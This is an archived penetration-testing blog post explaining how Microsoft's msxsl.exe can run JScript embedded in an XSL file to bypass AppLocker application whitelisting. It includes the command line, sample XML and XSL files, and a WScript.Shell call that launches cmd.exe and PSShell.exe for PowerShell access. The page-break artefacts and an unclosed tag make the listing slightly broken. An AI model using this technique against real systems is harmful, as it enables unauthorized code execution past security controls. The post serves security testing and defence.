AppLocker Bypass – MSXSL
Published: 2017-07-06 · Archived: 2026-04-06 00:34:32 UTC
Skip to content
According to Microsoft the msxsl.exe command line utility enables the user to perform command line Extensible
Stylesheet Language (XSL) transformations by using the Microsoft XSL processor. However this binary can be
used execute malicious JavaScript code and bypass application whitelisting protections. This was discovered by
Casey Smith and proof of concept was shared with the community over twitter.
The msxsl utility accepts XML and XSL files. The following needs to be executed from the command line in order
to run JavaScript code:
1 msxsl.exe customers.xml script.xsl
customers.xml
1
2
3
4
5
6
7
<?xml version= "1.0" ?>
<?xml-stylesheet type= "text/xsl" href= "script.xsl" ?>
<customers>
<customer>
<name>Microsoft</name>
</customer>
</customers>
script.xsl
1
2
3
4
5
<?xml version= '1.0' ?>
<xsl:stylesheet version= "1.0"
xmlns:msxsl= "urn:schemas-microsoft-com:xslt"
<msxsl:script language= "JScript" implements-prefix= "user" >
function xml(nodelist) {
https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
Page 1 of 3

6
7
8
9
10
11
12
13
14
15
16
17
var r = new ActiveXObject( "WScript.Shell" ).Run( "cmd.exe /k C:\\PSShell.exe" );
return nodelist.nextNode().xml;
}

The utility needs to be run from a location on the system that the user has permission to execute. The same applies
and for the untrusted binary PSShell which will provide PowerShell access even if PowerShell has been blocked
by AppLocker.
AppLocker Bypass – msxsl
https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
Page 2 of 3

PowerShell via MSXSL
Post navigation
Source: https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
Page 3 of 3